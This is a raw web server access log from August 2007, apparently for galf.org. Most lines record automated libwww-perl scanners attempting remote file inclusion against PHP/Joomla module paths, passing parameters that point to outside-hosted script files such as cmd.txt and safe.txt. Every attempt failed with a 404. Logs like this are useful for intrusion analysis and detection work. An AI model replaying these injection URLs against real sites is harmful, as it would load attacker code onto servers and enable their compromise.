81.21.73.27 - - [27/Aug/2007:13:09:53 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [27/Aug/2007:13:09:53 -0700] "GET /http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [27/Aug/2007:13:09:53 -0700] "GET /http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.116.167 - - [27/Aug/2007:13:09:54 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.186.116.167 - - [27/Aug/2007:13:09:54 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.186.116.167 - - [27/Aug/2007:13:09:55 -0700] "GET /http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.186.116.167 - - [27/Aug/2007:13:09:55 -0700] "GET /http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.58.105.162 - - [27/Aug/2007:13:10:01 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.58.105.162 - - [27/Aug/2007:13:10:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [27/Aug/2007:13:10:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:10:08 -0700] "GET /logs/access_070813.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:10:09 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:10:09 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [27/Aug/2007:13:10:10 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [27/Aug/2007:13:10:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [27/Aug/2007:13:10:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:10:55 -0700] "GET /logs/access_070813.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:10:56 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.54.39 - - [27/Aug/2007:13:10:56 -0700] "GET /logs//components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.39 - - [27/Aug/2007:13:10:56 -0700] "GET //components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:10:56 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:11:24 -0700] "GET /logs/access_070813.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:11:25 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:11:25 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.148.106.84 - - [27/Aug/2007:13:11:27 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 694248 "http://www.google.de/search?source=ig&hl=de&q=82.197.131.44&btnG=Google-Suche&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)" "www.galf.org"
84.148.106.84 - - [27/Aug/2007:13:11:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:11:47 -0700] "GET /logs//header.php?loc=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:11:47 -0700] "GET //header.php?loc=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.93.12.95 - - [27/Aug/2007:13:11:54 -0700] "GET /logs/http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.93.12.95 - - [27/Aug/2007:13:11:54 -0700] "GET /http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:12:36 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:12:37 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:13:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:13:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.104.72 - - [27/Aug/2007:13:14:27 -0700] "GET /logs/access_070716.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.avgwarez.altervista.org/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [27/Aug/2007:13:15:12 -0700] "GET /logs/access_070716.log/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [27/Aug/2007:13:15:19 -0700] "GET /logs/access_070806.log/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [27/Aug/2007:13:15:27 -0700] "GET /logs/access_070716.log/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
81.21.73.27 - - [27/Aug/2007:13:15:31 -0700] "GET /logs/access_070806.log/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.116.167 - - [27/Aug/2007:13:15:41 -0700] "GET /logs/access_070716.log/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.186.116.167 - - [27/Aug/2007:13:15:43 -0700] "GET /logs/access_070716.log/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.186.116.167 - - [27/Aug/2007:13:15:47 -0700] "GET /logs/access_070806.log/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.186.116.167 - - [27/Aug/2007:13:15:48 -0700] "GET /logs/access_070806.log/http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:16:50 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:16:51 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:16:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:17:13 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:17:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:17:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [27/Aug/2007:13:17:24 -0700] "GET //modules/xfsection/modify.php?dir_module=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.20.65.213 - - [27/Aug/2007:13:20:49 -0700] "GET /logs/access_070813.log/components/com_mospray/scripts/admin.php?basedir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.193.237.22 - - [27/Aug/2007:13:21:10 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fuckinx.ifrance.com/r6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.237.22 - - [27/Aug/2007:13:21:10 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fuckinx.ifrance.com/r6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.93.12.95 - - [27/Aug/2007:13:21:23 -0700] "GET /logs/access_070716.log/http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.237.22 - - [27/Aug/2007:13:21:33 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fuckinx.ifrance.com/r6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.22 - - [27/Aug/2007:13:21:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://fuckinx.ifrance.com/r6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.93.12.95 - - [27/Aug/2007:13:21:34 -0700] "GET /logs/access_070618.log/http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:21:57 -0700] "GET /logs/access_070806.log//components/com_flyspray/startdown.php?file=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:22:09 -0700] "GET /logs/access_070813.log//components/com_flyspray/startdown.php?file=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.194.149.56 - - [27/Aug/2007:13:23:08 -0700] "GET /logs/access_070813.log/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
147.253.75.19 - - [27/Aug/2007:13:23:32 -0700] "GET /logs/access_070813.log HTTP/1.1" 200 1179648 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS219US219&q=208%2e69%2e192%2e185" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.galf.org"
62.2.169.150 - - [27/Aug/2007:13:24:29 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [27/Aug/2007:13:24:32 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [27/Aug/2007:13:24:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.43.222.198 - - [27/Aug/2007:13:25:12 -0700] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [27/Aug/2007:13:25:19 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.43.222.198 - - [27/Aug/2007:13:25:25 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.192.125.110 - - [27/Aug/2007:13:26:30 -0700] "GET /logs/access_070716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://uploaded.justfree.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [27/Aug/2007:13:26:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [27/Aug/2007:13:26:33 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.24.152 - - [27/Aug/2007:13:27:58 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
38.118.74.79 - - [27/Aug/2007:13:28:19 -0700] "GET /logs/access_070723.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hokoten.net/templates_c/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.118.74.79 - - [27/Aug/2007:13:28:19 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hokoten.net/templates_c/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.118.74.79 - - [27/Aug/2007:13:28:19 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hokoten.net/templates_c/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.30.60.158 - - [27/Aug/2007:13:30:57 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.93.12.95 - - [27/Aug/2007:13:30:58 -0700] "GET /logs/access_070806.log/http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.58.105.162 - - [27/Aug/2007:13:31:32 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:32:27 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:32:27 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [27/Aug/2007:13:33:41 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.153.62.163 - - [27/Aug/2007:13:34:35 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:13:36:22 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [27/Aug/2007:13:36:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:13:36:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:39:09 -0700] "GET /logs/access_070618.log//modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:39:09 -0700] "GET //modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:39:10 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:13:39:16 -0700] "GET /logs/access_070806.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:13:39:17 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.140.211.10 - - [27/Aug/2007:13:39:18 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:13:39:38 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
195.49.173.97 - - [27/Aug/2007:13:39:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:40:47 -0700] "GET /logs/access_070716.log//modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:13:40:52 -0700] "GET /logs/access_070716.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.10.144.46 - - [27/Aug/2007:13:41:53 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.10.144.46 - - [27/Aug/2007:13:41:53 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:42:04 -0700] "GET /logs/access_070716.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.17.206.210 - - [27/Aug/2007:13:42:11 -0700] "GET /logs/mainfile.php?MAIN_PATH=http://s140610136.onlinehome.fr/hotmail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.17.206.210 - - [27/Aug/2007:13:42:11 -0700] "GET /mainfile.php?MAIN_PATH=http://s140610136.onlinehome.fr/hotmail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.39.68.87 - - [27/Aug/2007:13:43:02 -0700] "GET /logs/access_070730.log/zero_vote/error.php?dir=http://www.cardioexpress.gr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.39.68.87 - - [27/Aug/2007:13:43:03 -0700] "GET /zero_vote/error.php?dir=http://www.cardioexpress.gr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.39.68.87 - - [27/Aug/2007:13:43:03 -0700] "GET /logs/zero_vote/error.php?dir=http://www.cardioexpress.gr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:44:04 -0700] "GET /logs/access_070618.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
88.39.68.87 - - [27/Aug/2007:13:45:27 -0700] "GET /logs/access_070813.log/zero_vote/error.php?dir=http://www.cardioexpress.gr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:13:45:31 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:13:45:31 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:13:48:48 -0700] "GET /logs/access_070813.log//index.php?_REQUEST=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:13:48:49 -0700] "GET //index.php?_REQUEST=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:13:48:50 -0700] "GET /logs//index.php?_REQUEST=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:13:48:51 -0700] "GET /logs/access.log//index.php?_REQUEST=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:51:41 -0700] "GET /logs/access_070604.log//index.php?_REQUEST=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:51:42 -0700] "GET //index.php?_REQUEST=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:13:51:42 -0700] "GET /logs//index.php?_REQUEST=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:13:52:37 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:13:52:37 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:13:52:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:13:52:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
